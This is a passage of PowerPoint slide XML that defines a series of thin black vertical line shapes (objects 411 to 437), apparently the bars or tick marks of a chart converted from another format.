            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411" name="object 411"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6307641" y="5416733"/>
            <a:ext cx="0" cy="274320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="138430">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="138008"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="412" name="object 412"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6304644" y="5419157"/>
            <a:ext cx="3775" cy="271803"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1905" h="137160">
                <a:moveTo>
                  <a:pt x="0" y="136509"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="136509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1374" y="136785"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="object 413"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6335000" y="5404409"/>
            <a:ext cx="0" cy="286903"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="144780">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="144221"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414" name="object 414"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6334426" y="5402191"/>
            <a:ext cx="1258" cy="288162"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="145414">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="145347"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="415" name="object 415"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6362852" y="5409774"/>
            <a:ext cx="0" cy="280612"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="141605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="141515"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="416" name="object 416"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6362578" y="5410278"/>
            <a:ext cx="2517" cy="280612"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="141605">
                <a:moveTo>
                  <a:pt x="974" y="140990"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="974" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974" y="140990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="141266"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417" name="object 417"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6390758" y="5391509"/>
            <a:ext cx="0" cy="299487"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="151130">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="150737"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="418" name="object 418"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6389101" y="5390416"/>
            <a:ext cx="2517" cy="300745"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="151764">
                <a:moveTo>
                  <a:pt x="0" y="151013"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="151013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698" y="151289"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419" name="object 419"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6418665" y="5382414"/>
            <a:ext cx="0" cy="308295"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="155575">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="155321"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420" name="object 420"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6418393" y="5380452"/>
            <a:ext cx="1258" cy="310812"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="156844">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="156317"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="object 421"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6446517" y="5362015"/>
            <a:ext cx="0" cy="328429"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="165735">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="165621"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="422" name="object 422"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6443777" y="5365029"/>
            <a:ext cx="2517" cy="325912"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="164464">
                <a:moveTo>
                  <a:pt x="0" y="163824"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="163824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1244" y="164100"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="423" name="object 423"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6474423" y="5363109"/>
            <a:ext cx="0" cy="327171"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="165100">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="165069"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="424" name="object 424"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6473851" y="5365534"/>
            <a:ext cx="1258" cy="325912"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="164464">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="163846"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="425" name="object 425"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6502277" y="5343793"/>
            <a:ext cx="0" cy="347304"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="175260">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="174816"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="426" name="object 426"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6502001" y="5345135"/>
            <a:ext cx="2517" cy="346046"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="174625">
                <a:moveTo>
                  <a:pt x="974" y="173863"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="974" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974" y="173863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174139"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="427" name="object 427"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6530183" y="5322890"/>
            <a:ext cx="0" cy="367438"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="185419">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="185364"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="object 428"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6528526" y="5323930"/>
            <a:ext cx="2517" cy="367438"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="185419">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="184839"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="429" name="object 429"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6558088" y="5295532"/>
            <a:ext cx="0" cy="395121"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="199389">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="199170"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430" name="object 430"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6557816" y="5294149"/>
            <a:ext cx="1258" cy="396380"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="200025">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="199869"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="431" name="object 431"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6585940" y="5307339"/>
            <a:ext cx="0" cy="383796"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="193675">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="193206"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="432" name="object 432"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6583202" y="5305376"/>
            <a:ext cx="2517" cy="385055"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="194310">
                <a:moveTo>
                  <a:pt x="0" y="193926"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="193926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1244" y="194202"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433" name="object 433"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6613848" y="5270349"/>
            <a:ext cx="0" cy="420288"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="212089">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="211873"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="object 434"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6613274" y="5270852"/>
            <a:ext cx="1258" cy="420288"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="212089">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="211624"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="object 435"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6641207" y="5261759"/>
            <a:ext cx="0" cy="429097"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="216535">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="216208"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="object 436"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6640933" y="5261180"/>
            <a:ext cx="2517" cy="429097"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="216535">
                <a:moveTo>
                  <a:pt x="1098" y="216229"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1098" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1098" y="216229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="216505"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437" name="object 437"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6669059" y="5223686"/>
            <a:ext cx="0" cy="466847"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
